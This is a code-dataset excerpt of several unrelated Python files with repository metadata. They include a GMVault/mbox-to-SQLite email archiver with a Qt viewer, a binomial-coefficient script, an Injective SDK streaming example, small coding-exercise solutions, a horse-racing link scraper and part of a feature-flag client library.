splitter_right.setSizes([800,200])\n splitter = QSplitter(Qt.Horizontal)\n splitter.addWidget(splitter_left)\n splitter.addWidget(splitter_right)\n splitter.setSizes([800,200])\n #splitter.setStretchFactor(0,8)\n\n vbox = QVBoxLayout()\n vbox.addWidget(splitter)\n\n mainWin = QWidget()\n mainWin.setLayout(vbox)\n\n lineedit=QLineEdit()\n lineedit.returnPressed.connect(model_update)\n\n toolbar = QToolBar()\n toolbar.addWidget(lineedit)\n\n mainwin2 = QMainWindow()\n mainwin2.setCentralWidget(mainWin)\n mainwin2.addToolBar(toolbar)\n\n availableGeometry = app.desktop().availableGeometry(mainWin)\n mainwin2.resize(availableGeometry.width() * 2 / 3, availableGeometry.height() * 2 / 3)\n\n db = QSqlDatabase.addDatabase(\"QSQLITE\")\n db.setDatabaseName(dbfile)\n if not db.open():\n print(\"cannot open DB\")\n return\n\n myquery2 = db.exec_(\"select gmail_labels labels from messages group by labels order by labels\")\n itemlist = {}\n while myquery2.next():\n # folderlist.addItem(myquery2.value(0))\n createtreeitem(myquery2.value(0))\n\n model=QSqlTableModel()\n model_update()\n tabview.setModel(model)\n\n mainwin2.show()\n app.exec_()\n\n# for winmail.dat\nfrom tnefparse.tnef import TNEF, TNEFAttachment, TNEFObject\nfrom tnefparse.mapi import TNEFMAPI_Attribute\ndef my_tnef_parse(filepath=\"winmail.dat\"):\n t = TNEF(open(filepath).read(), do_checksum=True)\n for a in t.attachments:\n with open(a.name, \"wb\") as afp:\n afp.write(a.data)\n sys.exit(\"Successfully wrote %i files\" % len(t.attachments))\n\ndef md5sum(filename, blocksize=65536):\n hash = hashlib.md5()\n with open(filename, \"rb\") as f:\n for block in iter(lambda: f.read(blocksize), b''):\n hash.update(block)\n return hash.hexdigest()\n\ndef dateparse_normalized(datestr):\n datestr=datestr.replace('+0000 GMT','GMT') # \"+0000 GMT\" raises an error in the date parser\n for tmp in datestr.split(','): # Remove everything before and after (potential) comma, since they are error prone (e.g. if the string starts with \"Wen, ...\" instead of \"Wed, ...\" the parser would fail without this. Same with regards to the end of the string)\n if re.search(r'..:..:..', tmp):\n #tmp = re.sub(r'(.*..:..:..) .*', '\\\\1', tmp)\n tmp = re.sub(r'(.*..:..:[^\\(]*).*', '\\\\1', tmp) # FIXME: keep year e.g. in case of 'Wed Feb 29 07:02:03 +0000 2012'\n break\n return int(datetime.timestamp(dateparse(tmp)))\n # FIXME \"UnknownTimezoneWarning: tzname EDT identified but not understood. Pass `tzinfos` argument in order to correctly return a timezone-aware datetime. In a future version, this will raise an exception.\"\n\ndef cset_sanitize(cset):\n if cset==None or cset==\"utf-8//translit\" or cset=='utf8':\n cset=\"utf-8\"\n elif cset=='iso-2022-cn': # this codec is not supported in Python, and they don't care (bug report https://bugs.python.org/issue2066 is closed with status WONTFIX)\n cset='iso-2022-jp-2' # FIXME: not sure at all and I know nothing about those iso-2022 encodings, but looking at https://docs.python.org/2/library/codecs.html#standard-encodings I wonder whether it might be an alternative ? Anyway I have to choose something...\n elif cset=='IBM-eucKR':\n cset='euc_kr'\n elif cset.startswith('windows-1252'): # There was a bug with charset=\"windows-1252http-equivContent-Type\"\n cset='windows-1252'\n elif cset=='windows-874':\n cset='iso-8859-11' # FIXME: also not sure...\n elif cset.startswith('charset'):\n cset=cset[cset.find('\"')+1:cset.rfind('\"')]\n try: # got weird charset names such as \"charset=y\" or \"charset=x-binaryenc\". Default is to use utf-8 in case of an unknown charset\n 'a'.encode(cset)\n except LookupError:\n print(\"\\nUnsupported charset : \" + cset)\n cset='utf-8'\n return cset\n\ndef qdecode(qstr):\n # parse the \"Q-encoding\" (not exhaustive, but it works for my cases)\n #if myfield_qp_list[2] in [\"Q\", \"B\", 'q', 'b']:\n #cset = cset_sanitize(myfield_qp_list[1])\n #myfield_val = myfield_qp_list[3].replace('_', ' ')\n #else:\n #myfield_val = msg[myfield][2:-2].replace('_', ' ')\n if qstr.startswith('=?'):\n qlist = qstr.split('?')\n if qlist[2] in [\"Q\", \"B\", 'q', 'b']:\n cset = cset_sanitize(qlist[1]) # FIXME: what if multiline q-entry has different encoding between lines ? (can it happen ?)\n ret_tmp = \"\"\n nlines = int((len(qlist) - 1) / 4)\n for k in range(nlines):\n ret_tmp += qlist[3+4*k]\n try:\n ret = quopri.decodestring(ret_tmp).decode(cset)\n except UnicodeDecodeError:\n ret = quopri.decodestring(ret_tmp).decode('iso8859-1') # Handle case where utf-8 is announced but the real encoding is different (I only got this bug once and the real encoding was iso8859-1). FIXME: handle more cases i.e. guess the real encoding\n except ValueError:\n ret_tmp = quopri.encodestring(ret_tmp.encode())\n ret = quopri.decodestring(ret_tmp).decode(cset)\n return ret\n return qstr\n\ndef mbox_messages(mboxfile):\n # Generator sending messages one-by-one from mbox. I wrote this after observing that mailbox.mbox(mboxfile) took several minutes before returning the first message (it seems it needs to load/parse the whole mbox before starting, which can take long in the case of large mbox files...)\n lprev=''\n text=''\n with open(mboxfile,'r',encoding='utf8') as f:\n for line in f:\n if line.startswith('From ') and lprev=='\\n' and \"@xxx\" in line: # FIXME: more reliable trigger ?\n #msg = email.message_from_bytes(text.encode())\n msg = email.message_from_string(text)\n msg.set_unixfrom(line) # FIXME: takes the \"from\" of next message instead of current\n text=''\n yield msg\n lprev=line\n text+=line\n\nimport mmap\ndef mbox_messages2(mboxfile):\n # Alternative approach. May be deleted later since it does not fix encoding issues (which are introduced by Google Takeout...). Need to check which version is faster\n text=b''\n mlen = os.path.getsize(mboxfile)\n with open(mboxfile,'r+b') as f:\n mm = mmap.mmap(f.fileno(), 0)\n i1=0\n while i1 < mlen:\n i2 = mm.find(b'\\r\\n\\r\\nFrom ', i1) # FIXME: more reliable trigger ?\n if i2==-1: # FIXME: needed ?\n print('ret')\n return\n text = mm[i1:i2]\n i3=text.find(b'\\r\\nX-GM-THRID:')\n msg = email.message_from_bytes(text)\n msg.set_unixfrom(text[:i3].decode())\n i1=i2+4 # +4 is to account for '\\r\\n\\r\\n'\n yield msg\n\n#import mailbox\ndef scan_mbox(mboxfile, outdir):\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n if os.path.exists(outdir+'/mails.db'):\n db=MDB(outdir+'/mails.db') # don't \"drop table if exists\"\n else:\n db=MDB(outdir+'/mails.db')\n db.createdb()\n mbox_size = os.path.getsize(mboxfile)\n #mbox = mailbox.mbox(mboxfile) # FIXME: slow\n k=0\n ltot=0\n for message in mbox_messages(mboxfile): #mbox.items():\n #for key,message in mbox.items():\n mfrom=message.get_unixfrom().replace('\\n','') # in the case of gmail mbox, includes gmail_id followed by date\n flags = []\n labels = []\n if 'X-Gmail-Labels' in message:\n entries= qdecode(message['X-Gmail-Labels']).replace('_', ' ').split(',')\n for l in entries:\n if l.startswith('[') or l.startswith('IMAP '):\n continue\n elif l in ('Ouvert','Non lus','Important','Favoris','Non lus'):\n flags.append(l)\n else:\n labels.append(l)\n labelstr = '_'.join(labels) if labels!= [] else None\n\n #print(mfrom)\n #mfrom=message.get_from() # in the case of gmail mbox, includes gmail_id followed by date\n msgdec=decodemail(message, outdir, labelstr)\n if msgdec == None:\n continue\n msgdec[\"msg_id\"] = None\n msgdec[\"thread_id\"] = int(msgdec[\"X-GM-THRID\"])\n msgdec[\"gm_id\"] = mfrom.split('@xxx')[0] #int(msgjson['gm_id'])\n msgdec['flags'] = '_'.join(flags) if flags!= [] else None\n #msgdec['gmail_timestamp']=datetime.fromtimestamp(msgjson['internal_date'])\n db.addmail(msgdec)\n db.conn.commit()\n k+=1\n ltot+=len(message.as_string())\n sys.stderr.write(f\"\\r\\033[KProcessing message {k} ({ltot>>20}/{mbox_size>>20} MB) : {msgdec['Date']}\")\n\ndef scandir_gmvault(rootdir, outdir, includelist=[]): # '2009-01'\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n if os.path.exists(outdir+'/mails.db'):\n db=MDB(outdir+'/mails.db') # don't \"drop table if exists\"\n else:\n db=MDB(outdir+'/mails.db')\n db.createdb()\n for dirname,_,files in os.walk(rootdir):\n included=False\n for k in includelist:\n if k in dirname:\n included=True\n break\n if included==False and len(includelist)>0:\n continue\n for entry in files:\n if entry.endswith(\".meta\"):\n continue\n id = entry[:entry.rfind('.eml')]\n if db.checkmail(id):\n sys.stderr.write(\"\\r\\033[KSkipping: \" + id)\n continue\n msgjson=decodejson(dirname+'/'+id+\".meta\")\n\n # Process labels\n # Labels are concatenated into a single string (so it can correspond to a folder on the filesystem).\n labels = [l.replace('\\\\','') for l in msgjson['labels'] if not l.startswith('\\\\') or l in ('\\\\Sent', '\\\\Inbox')]\n flags = [f.replace('\\\\','') for f in msgjson['flags']]\n flags.extend([l.replace('\\\\','') for l in msgjson['labels'] if l.startswith('\\\\') and not l in ('\\\\Sent', '\\\\Inbox')])\n if len(labels)>1: # some labels are included in others and repeated multiple times => keep the longest (most complete) one\n for l1 in labels:\n for l2 in labels:\n if l1!=l2 and l2.startswith(l1):\n labels.remove(l1)\n if \"Inbox\" in labels and \"Sent\" in labels:\n labels.remove('Inbox')\n if labels==[]:\n labels=['Inbox']\n labelstr='__'.join(labels).replace('\\\\', '').replace(\"[\",'_').replace(']','_')\n if 'portant' in labelstr or \"imap\" in labelstr or \"tarred\" in labelstr: # Important|imap|Starred\n print(\"Processing: \" + dirname+'/'+entry)\n print(labels)\n\n if not os.path.exists(outdir + '/' + labelstr):\n os.makedirs(outdir + '/' + labelstr)\n\n with open(dirname+'/'+entry) as fp:\n #msg = email.parser.Parser().parse(fp)\n msg=email.message_from_file(fp)\n msgdec = decodemail(msg, outdir, labelstr)\n if msgdec == None:\n continue\n msgdec[\"msg_id\"]=msgjson[\"msg_id\"]\n msgdec[\"thread_id\"] = int(msgjson[\"thread_ids\"])\n msgdec[\"gm_id\"] = int(msgjson['gm_id'])\n msgdec['flags'] = '_'.join(flags)\n msgdec['gmail_timestamp']=datetime.fromtimestamp(msgjson['internal_date'])\n db.addmail(msgdec)\n sys.stderr.write(\"\\r\\033[KProcessing: \" + entry + ', date : ' + msgdec['Date'])\n db.conn.commit()\n\ndef decodemail(msg, outdir1, labelstr='Default'):\n #_structure(msg)\n csets=msg.get_charsets()\n cset='utf-8'\n for c in csets:\n if c==None:\n continue\n if c.startswith('charset'):\n c=c[c.find('\"')+1:c.rfind('\"')]\n cset=cset_sanitize(c)\n break\n\n msgdec={}\n for myfield in ('From', 'To', 'Cc', 'Bcc', 'Date', 'Subject', 'X-GM-THRID'): # \"Received\"\n if myfield in msg:\n msgdec[myfield]=qdecode(msg[myfield]).replace('_', ' ')\n else:\n msgdec[myfield] = None\n if msgdec['Date']==None:\n mfrom=msg.get_unixfrom() # in the case of gmail mbox, includes gmail_id followed by date\n #mfrom=msg.get_from() # in the case of gmail mbox, includes gmail_id followed by date\n msgdec['Date'] = mfrom.replace('\\n','').split('@xxx ')[1]\n\n #labelstr = msgdec['X-Gmail-Labels'] if 'X-Gmail-Labels' in msgdec and msgdec['X-Gmail-Labels']!=None else labelstr\n outdir= outdir1 + '/' + labelstr\n msgdec['Attachments'] = []\n msgdec['EmbeddedImg'] = {}\n msgdec['Size'] = 0\n msgdec['SizeAtt'] = 0\n msgdec['NumAtt'] = 0\n msgdec['Outdir'] = outdir\n msgdec['labelstr'] = labelstr\n msgdec['Date_parsed'] = dateparse_normalized(msgdec['Date'])\n\n #body2=msg.get_body(preferencelist=('plain', 'html'))\n decodepart(msg, msgdec) # recursive part\n if not 'Body' in msgdec and not 'BodyHTML' in msgdec:\n return None\n\n if not \"BodyHTML\" in msgdec and \"Body\" in msgdec and msgdec['Body'].find('[cid:') and len(msgdec['EmbeddedImg'].keys())>0:\n # When there is only plain text together with embedded images, generate the corresponding HTML with references to images\n msgdec[\"BodyHTML\"] = \"
\" + re.sub(r'\\[(cid:.*)\\]', '', msgdec['Body']) + \"
\"\n if 'BodyHTML' in msgdec and msgdec['BodyHTML'].find(' rename new files with __2, __3, etc.\n ki=filename.rfind('.')\n if ki>0:\n k_base=filename[:ki]\n k_ext=filename[ki:]\n else:\n k_base=filename\n k_ext=\"\"\n rx = re.search(r'([^_\\.]+)__([0-9]+)',k_base)\n if rx:\n filename = rx.group(1) + '__' + str(int(rx.group(2))+1) + k_ext\n else:\n filename = k_base + '__2' + k_ext\n\n with open(dir+'/'+filename, 'wb') as fp:\n fp.write(filecontents)\n os.utime(dir+'/'+filename, (msgdec[\"Date_parsed\"],msgdec[\"Date_parsed\"]))\n msgdec['Attachments'].append(filename)\n msgdec['SizeAtt'] += len(filecontents)\n msgdec['NumAtt'] += 1\n return filename\n\n while isinstance(part.get_payload(),email.message.Message):\n part=part.get_payload()\n if part.is_multipart():\n for subpart in part.get_payload():\n decodepart(subpart, msgdec, level+1) # recursive call (theoretically there could be any structure and any levels of nested messages)\n #if ctype==\"multipart/alternative\":\n # pass\n #elif ctype==\"multipart/related\":\n # pass\n\n else:\n ctype = part.get_content_type()\n cset=cset_sanitize(part.get_content_charset())\n dir=msgdec['Outdir']\n #print(' '*level + 'L' + str(level) + ' -> content-type : ' + ctype + ', cset=' + cset)\n if(ctype==\"text/plain\" and not \"Body\" in msgdec): # FIXME: we didn't check whether we are really in a \"multipart/alternative\" section\n try:\n body = part.get_payload(decode=True).decode(cset)\n except UnicodeDecodeError:\n body = part.get_payload(decode=False)\n msgdec['Body'] = body # FIXME: change meta charset to utf-8\n elif(ctype==\"text/html\" and not \"BodyHTML\" in msgdec): # FIXME: we didn't check whether we are really in a \"multipart/alternative\" section\n try:\n body = part.get_payload(decode=True).decode(cset)\n except UnicodeDecodeError:\n body = part.get_payload(decode=False)\n msgdec['BodyHTML'] = body\n elif \"Content-ID\" in part and ctype.startswith(\"image\"): # FIXME: we didn't check whether we are really in a \"multipart/related\" section\n cid=part[\"Content-ID\"][1:-1]\n body=cid\n msgdec['EmbeddedImg'][cid]=\"data:\"+ctype+\";base64,\"+part.get_payload(decode=False).replace('\\n','')\n elif part.get_filename(): # FIXME: we didn't check whether we are really in a \"multipart/mixed\" section\n #if ctype.startswith(\"application\") or ctype.startswith(\"multipart\"):\n #filename2=email.utils.collapse_rfc2231_value(filename2).strip()\n #filename2=part.get_param('filename', None, 'content-disposition')\n filename=part.get_filename()\n filename = qdecode(filename)\n filecontents = part.get_payload(decode=True)\n if (filename==\"signature.asc\" or filename=='PGP.sig') and not 'signature' in msgdec:\n msgdec['signature'] = filecontents.decode()\n #elif filename==\"smime.p7s\": # FIXME: check contents beyond file name\n # msgdec['signature'] = part.get_payload(decode=False)\n # elif filename=='oledata.mso':\n # pass # FIXME: handle this\n elif filename=='winmail.dat':\n k=extract_file(dir, 'winmail.dat', filecontents) # FIXME: not needed anymore after we extract the other stuffs (embedded RTF, etc)\n t = TNEF(filecontents, do_checksum=True)\n #print(t.codepage)\n #t.dump(force_strings=True)\n if hasattr(t,'body'):\n data=getattr(t, 'body')\n if isinstance(data,str):\n data=data.encode()\n extract_file(dir,secure_filename(k)+'.txt', data)\n if hasattr(t,'htmlbody'):\n data=getattr(t, 'htmlbody')\n if isinstance(data,str):\n data=data.encode()\n extract_file(dir,secure_filename(k)+'.html', data)\n if hasattr(t,'rtfbody'):\n data=getattr(t, 'rtfbody')\n if isinstance(data,str):\n data=data.encode()\n extract_file(dir,secure_filename(k)+'.rtf', data)\n\n for a in t.attachments:\n winname = 'winmail_'+secure_filename(a.long_filename())\n # if isinstance(a._name, bytes):\n # winname=a._name.decode('cp1252').strip('\\x00')\n # else:\n # winname=a._name.strip('\\x00')\n if isinstance((a.data), bytes):\n dat=a.data\n elif isinstance((a.data), list):\n dat=a.data[0]\n extract_file(dir, winname, dat)\n else:\n filename = secure_filename(filename)\n if filename==None or filename==\"\":\n filename=\"__noname__\" + ctype.replace('/','_')\n extract_file(dir, filename, filecontents)\n else:\n body=\"__None__\" #+ str(part.get_payload(decode=True))\n\ndef decodejson(filename):\n with open(filename) as fp:\n my_json = json.loads(fp.read())\n return my_json\n\nclass MDB():\n def __init__(self, dbname, domagic=False):\n self.conn = sqlite3.connect(dbname)\n #self.init_path=init_path.rstrip('/')\n\n def createdb(self):\n cur = self.conn.cursor() # FIXME: \"contacts\" and \"attachment\" tables are still unused\n cur.executescript('''\n drop table if exists messages;\n create table messages(\n id integer primary key autoincrement,\n gmail_msgid text,\n gmail_threadid integer,\n gmail_labels text,\n gm_id integer,\n datetime integer,\n msgfrom integer,\n msgto text,\n msgcc text,\n subject text,\n body_text text,\n body_html text,\n attachments text,\n flags text,\n signature text,\n size integer,\n sizeatt integer,\n numatt integer\n );\n create index messages_gm_id_idx on messages(gm_id);\n\n PRAGMA main.page_size=4096;\n PRAGMA main.cache_size=10000;\n PRAGMA main.locking_mode=EXCLUSIVE;\n PRAGMA main.synchronous=NORMAL;\n ''') # PRAGMA main.journal_mode=WAL;\n\n def checkmail(self, gm_id):\n cur = self.conn.cursor()\n rs=cur.execute('select id from messages where gm_id=?', (gm_id,)).fetchall()\n if len(rs)>0:\n return True\n return False\n\n def addmail(self, m):\n cur = self.conn.cursor()\n cur.execute(\"insert into messages values (null, ?,?,?,?, ?,?,?,?, ?,?,?,?, ?, ?,?,?,?)\", (\n m[\"msg_id\"], m[\"thread_id\"], m['labelstr'], m['gm_id'],\n int(m['Date_parsed']), m['From'], m['To'], m['Cc'],\n m[\"Subject\"], m['Body'], m['BodyHTML'], '¤'.join(m[\"Attachments\"]), m['flags'], m[\"signature\"],\n m[\"Size\"],m[\"SizeAtt\"],m[\"NumAtt\"]\n ))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(dest=\"subcommand\", required=True)\n\n parser_createdb = subparsers.add_parser('createdb', help=\"Scan directory\")\n parser_createdb.add_argument(\"gmvault_dir\", help=\"GMVault dir or mountpoint\")\n parser_createdb.add_argument(\"outdir\", help=\"Output dir\")\n\n parser_mbox = subparsers.add_parser('mbox', help=\"Scan MBox from Google Takeout\")\n parser_mbox.add_argument(\"mboxfile\", help=\"MBox file\")\n parser_mbox.add_argument(\"outdir\", help=\"Output dir\")\n\n parser_gui = subparsers.add_parser('gui', help=\"Launch GUI\")\n parser_gui.add_argument(\"dbfile\", help=\"DB file\")\n\n args = parser.parse_args()\n\n if args.subcommand==\"createdb\":\n scandir_gmvault(args.gmvault_dir + \"/db\", args.outdir)\n elif args.subcommand==\"mbox\":\n scan_mbox(args.mboxfile,args.outdir)\n elif args.subcommand==\"gui\":\n gui(args.dbfile)\n","repo_name":"karteum/gmvaultdb","sub_path":"gmvaultdb.py","file_name":"gmvaultdb.py","file_ext":"py","file_size_in_byte":31305,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"73240387010","text":"'''\nTitulo: Calculo de coeficiente binomial\nDescripcion: A partir de un numero solicitado al usuario y un coeficiente tambien solicitado al usuario, el programa realiza el calculo del coeficiente binomial a partir de estos numeros\nFecha: 16 de Mayo del 2022\nAutor: Espinoza Bautista Daniel\n'''\n# Importamos las librerias\nfrom time import time\n\ndef calBinomial(n, k, dp):\n \n # Si el valor esta en la tabla de busqueda se regresa el valor\n if dp[n][k] != -1:\n return dp[n][k]\n \n # Guardamos el valor en la tabla y posteriormente lo regresamos\n if k == 0:\n dp[n][k] = 1\n return dp[n][k]\n \n # Si se encuentra el numero regresamos el valor del numero y lo guardamos\n if k == n:\n dp[n][k] = 1\n return dp[n][k]\n \n # Guardamos el valor en la tabla de busqueda y realizamos el corrimiento del arreglo para realizar la busqueda\n dp[n][k] = (calBinomial(n-1, k-1, dp) +\n calBinomial(n-1, k, dp))\n \n # Regresamos el arreglo de la tabla de busqueda\n return dp[n][k]\n\ndef binomial(n, k):\n \n # Creamos una tabla de busqueda temporal\n dp = [ [ -1 for y in range(k + 1) ]\n for x in range(n + 1) ]\n \n # Realizamos el chequeo de la tabla para hacer la suma del coeficiente binomial\n return calBinomial(n, k, dp)\n \n# Solicitamos al usuario el numero al que calcularemos el coeficiente\nn = int(input(\"Dame el valor del numero a calcular su coeficiente: \"))\n\n# Solicitamos al usuario el coeficiente para calcularle al numero\nk = int(input(\"Dame el valor del coeficiente: \"))\nprint(\"\\n\")\n\n# Inicializamos la variable para contar el tiempo de ejecucion\ntiempo_in = time()\n \n# Realizamos el calculo del coeficiente\nprint(\"Valor del coeficiente binomial de \"+str(n)+\"\\n\"+\"Con coeficiente \" +str(k)+\"\\n\"+\"Es: \",binomial(n, k))\nprint(\"\\n\")\n\n# Calculamos el tiempo que tarda en ejecutarse y lo imprimimos en pantalla\ntiempo_fin = time() - tiempo_in\nprint(\"Tiempo de ejecucion: %.10f segundos.\" %tiempo_fin)\n","repo_name":"danielDEBIAN/dynamic_algorithms","sub_path":"binomial.py","file_name":"binomial.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7195767205","text":"import asyncio\nimport logging\n\nfrom pyinjective.client import Client\nfrom pyinjective.constant import Network\n\nasync def main() -> None:\n network = Network.testnet()\n client = Client(network, insecure=False)\n market_ids = [\"0x4ca0f92fc28be0c9761326016b5a1a2177dd6375558365116b5bdda9abc229ce\", \"0x979731deaaf17d26b2e256ad18fecd0ac742b3746b9ea5382bac9bd0b5e58f74\"]\n subaccount_id = \"0xc6fe5d33615a1c52c08018c47e8bc53646a0e101000000000000000000000000\"\n # always use single market if provided\n # if neither of these params is provided, streams from all markets.\n positions = client.stream_derivative_positions(\n market_id=market_ids[0],\n # market_ids=market_ids,\n subaccount_id=subaccount_id\n )\n for position in positions:\n print(position)\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n asyncio.get_event_loop().run_until_complete(main())\n","repo_name":"anodaram/injective-sdk-python","sub_path":"examples/sync/exchange_client/derivative_exchange_rpc/9_StreamPositions.py","file_name":"9_StreamPositions.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13599013494","text":"class Solution(object):\n def removeNthFromEnd(self, head, n):\n c = 0\n noOfNodes = 0\n temp = head\n while temp != None:\n noOfNodes += 1\n temp = temp.next\n temp = head\n prev = None\n while temp != None:\n if prev != None and c == noOfNodes-n:\n prev.next = temp.next\n elif prev == None and c == noOfNodes-n:\n return head.next\n c += 1\n prev = temp\n temp = temp.next\n return head","repo_name":"abdulalikhan/LeetCode-Submissions","sub_path":"19-remove-nth-node-from-end-of-list/19-remove-nth-node-from-end-of-list.py","file_name":"19-remove-nth-node-from-end-of-list.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"27914937940","text":"# coding: UTF-8\nfrom bs4 import BeautifulSoup\nimport re\n\nfile_path=\"data/sample.html\"\nbase_url=\"http://www.netkeiba.com/\"\n\nhtml = open(file_path,\"r\")\nsoup = BeautifulSoup(html,\"html.parser\")\n\n# タグつきで同じものが2つ引っかかる\nraces = soup.find_all('a',href=re.compile(\"^/\\?pid=race\\&\"))\nlist_race=[]\nfor race in races:\n list_race.append(base_url + race.get('href'))\n # print(base_url + race.get('href'))\n\n# 重複を削除する(※divのclassでFilterできないか?)\nlist_uniq = list(set(list_race))\nfor url in list_uniq:\n print(url)\n\n\n# お試し\nprint(\"-----------------------\")\n# li = soup.select('div[class^=\"racename\"]')\nli = soup.select('div.racename')\nfor l in li:\n print(\" - - - - -\")\n # print(l)\n a = l.find_all('a',href=re.compile(\"^/\\?pid=race\\&\"))\n print(a)\n print(a[0].get('href'))\n for b in a:\n print(b.get('href'))\n\n# print([a.get(\"href\") for a in li.find_all(\"a\")])\n\nhtml.close()\n\n\n","repo_name":"calick/pythonSample","sub_path":"webスクレイピング/work/collectUrl.py","file_name":"collectUrl.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20731696525","text":"# 내 풀이\ndef solution(id_list, report, k):\n # 받을 이메일 개수\n answer = {id: 0 for id in id_list}\n # key = 신고 당함, value : 신고함\n r = {id: [] for id in id_list}\n\n # 리스트 내 중복되는 값 무시하기 위해서\n report = list(set(report))\n\n for i in range(len(report)):\n user, warn = report[i].split()\n r[warn].append(user)\n\n for item, value in r.items():\n if len(value) >= k:\n for key in value:\n answer[key] += 1\n\n return list(answer.values())\n\n# 다른 사람 풀이\ndef solution(id_list, report, k):\n answer = [0] * len(id_list)\n reports = {x : 0 for x in id_list}\n\n for r in set(report):\n reports[r.split()[1]] += 1\n\n for r in set(report):\n if reports[r.split()[1]] >= k:\n answer[id_list.index(r.split()[0])] += 1\n\n return answer","repo_name":"rkdtndk99/Algorithm","sub_path":"Python/Programmers/Lv.1/신고 결과 받기.py","file_name":"신고 결과 받기.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7841870114","text":"\"\"\"Top-level package for molasses.\"\"\"\n\n__author__ = \"\"\"James Hrisho\"\"\"\n__email__ = 'james.hrisho@gmail.com'\n__version__ = '0.1.2'\n\nimport logging\nimport requests\nfrom random import random\nimport zlib\nimport json\nimport sseclient\nimport math\nimport threading\nimport time\nimport semver\nfrom typing import Dict, Optional\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom apscheduler.triggers.interval import IntervalTrigger\nlogger = logging.getLogger(__name__)\n\nBASE_URL = 'https://sdk.molasses.app/v1'\n\n\nclass MolassesClient:\n \"\"\"\n docstring\n \"\"\"\n __cache = {}\n __initialized = False\n __polling = False\n __sseclient = None\n __retry_count = 0\n\n def __init__(self, api_key: str, auto_send_events=False, polling=False, base_url=BASE_URL):\n self.api_key = api_key\n self.auto_send_events = auto_send_events\n self.base_url = base_url\n self.scheduler = BackgroundScheduler()\n self.polling = polling\n logger.propagate = True\n logger.info(\"starting to connect\")\n if polling is True:\n self.__fetch_features()\n self.features_job = self.scheduler.add_job(self.__fetch_features,\n trigger=IntervalTrigger(seconds=int(15)))\n self.scheduler.start()\n else:\n thread = threading.Thread(\n target=self.__start_stream, args=())\n thread.daemon = True\n thread.start()\n\n def is_active(self, key: str, user: Optional[Dict] = None):\n if self.__initialized is not True:\n return False\n\n if key in self.__cache:\n feature = self.__cache[key]\n result = self.__is_active(feature, user)\n if user and \"id\" in user and self.auto_send_events:\n self.__send_events({\n \"event\": \"experiment_started\",\n \"tags\": user[\"params\"],\n \"userId\": user[\"id\"],\n \"featureId\": feature[\"id\"],\n \"featureName\": key,\n \"testType\": result if \"experiment\" else \"control\"\n })\n return result\n else:\n return False\n\n def experiment_started(self, key: str, user: Optional[Dict] = None, additional_details: Dict = {}):\n if self.__initialized is not True or user is None or \"id\" not in user:\n return False\n if key not in self.__cache:\n return False\n feature = self.__cache[key]\n\n result = self.__is_active(feature, user)\n self.__send_events({\n \"event\": \"experiment_started\",\n \"tags\": {**user[\"params\"], **additional_details},\n \"userId\": user[\"id\"],\n \"featureId\": feature[\"id\"],\n \"featureName\": key,\n \"testType\": result if \"experiment\" else \"control\"\n })\n\n def track(self, key: str, user: Optional[Dict] = None, additional_details: Dict = {}):\n tags = additional_details\n if user is None or \"id\" not in user:\n return False\n if \"params\" in user:\n tags = {**user[\"params\"], **additional_details}\n self.__send_events({\n \"event\": key,\n \"tags\": tags,\n \"userId\": user[\"id\"]\n })\n\n def experiment_success(self, key: str, user: Optional[Dict] = None, additional_details: Dict = {}):\n if self.__initialized is not True or user is None or \"id\" not in user:\n return False\n if key not in self.__cache:\n return False\n feature = self.__cache[key]\n result = self.__is_active(feature, user)\n self.__send_events({\n \"event\": \"experiment_success\",\n \"tags\": {**user[\"params\"], **additional_details},\n \"userId\": user[\"id\"],\n \"featureId\": feature[\"id\"],\n \"featureName\": key,\n \"testType\": result if \"experiment\" else \"control\"\n })\n\n def stop(self):\n if self.__polling is True:\n self.features_job.stop()\n self.scheduler.shutdown()\n else:\n self.__sseclient.close()\n\n def __is_active(self, feature, user=None):\n if feature[\"active\"] is not True:\n return False\n if user is None or \"id\" not in user:\n return True\n segment_map = {}\n for feature_segment in feature[\"segments\"]:\n segment_type = feature_segment[\"segmentType\"]\n segment_map[segment_type] = feature_segment\n if \"alwaysControl\" in segment_map and self.__is_user_in_segment(user, segment_map[\"alwaysControl\"]):\n return False\n if \"alwaysExperiment\" in segment_map and self.__is_user_in_segment(user, segment_map[\"alwaysExperiment\"]):\n return True\n if \"everyoneElse\" in segment_map:\n return self.__get_user_percentage(user[\"id\"], segment_map[\"everyoneElse\"][\"percentage\"])\n return False\n\n def __get_user_percentage(self, id=\"\", percentage=0):\n if percentage == 100:\n return True\n if percentage == 0:\n return False\n c = zlib.crc32(bytes(id, \"utf-8\")) & 0xffffffff\n v = abs(c % 100)\n return v < percentage\n\n def __is_user_in_segment(self, user: Optional[Dict], s: Dict):\n user_constraints = s[\"userConstraints\"]\n constraints_length = len(user_constraints)\n constraints_to_be_met = 1 if s[\"constraint\"] == \"any\" else constraints_length\n constraints_met = 0\n\n for i in range(constraints_length):\n constraint = user_constraints[i]\n param = constraint[\"userParam\"]\n param_exists = param in user[\"params\"]\n user_value = None\n if param_exists:\n user_value = user[\"params\"][param]\n if param == \"id\":\n param_exists = True\n user_value = user[\"id\"]\n if self.__meets_constraint(user_value, param_exists, constraint):\n constraints_met = constraints_met + 1\n return constraints_met >= constraints_to_be_met\n\n def __parse_number(self, user_value):\n if type(user_value) is (int, float, complex):\n return user_value\n elif type(user_value) is bool:\n return 1 if user_value else 0\n else:\n return float(user_value)\n\n def __parse_bool(self, user_value):\n if type(user_value) is (int, float, complex):\n return user_value == 1\n elif type(user_value) is bool:\n return user_value\n else:\n return 